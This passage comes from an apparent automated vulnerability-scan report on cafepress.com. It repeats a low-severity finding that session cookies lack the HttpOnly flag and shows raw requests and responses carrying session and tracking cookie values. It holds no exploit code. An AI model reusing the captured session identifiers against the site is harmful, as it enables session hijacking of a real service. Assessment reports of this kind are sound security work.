Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+stadium-blanket
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:45 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+stadium-blanket HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59409
Date: Sun, 26 Dec 2010 13:48:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:45 GMT; path=/
Set-Cookie: cp_sc=201672; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:45 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.31. http://www.cafepress.com/+steins
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+steins
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+steins HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Cteonnt-Length: 58661
Date: Sun, 26 Dec 2010 13:47:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/
Set-Cookie: cp_sc=100143; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.32. http://www.cafepress.com/+stocking
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+stocking
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:38 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+stocking HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 59563
Date: Sun, 26 Dec 2010 13:48:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:38 GMT; path=/
Set-Cookie: cp_sc=201674; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:38 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.33. http://www.cafepress.com/+sweatshirts-hoodies
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+sweatshirts-hoodies
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:58 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+sweatshirts-hoodies HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 60337
Date: Sun, 26 Dec 2010 13:44:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:58 GMT; path=/
Set-Cookie: cp_sc=100031; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:58 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.34. http://www.cafepress.com/+thermos
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+thermos
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+thermos HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 58876
Date: Sun, 26 Dec 2010 13:47:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/
Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:07 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.35. http://www.cafepress.com/+underwear-panties
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+underwear-panties
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+underwear-panties HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 59386
Date: Sun, 26 Dec 2010 13:46:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/
Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:58 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3.36. http://www.cafepress.com/+water-bottles
Summary
Severity: Low
Confidence: Firm
Host: http://www.cafepress.com
Path: /+water-bottles
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:04 GMT; path=/
The ASP.NET_SessionId cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+water-bottles HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 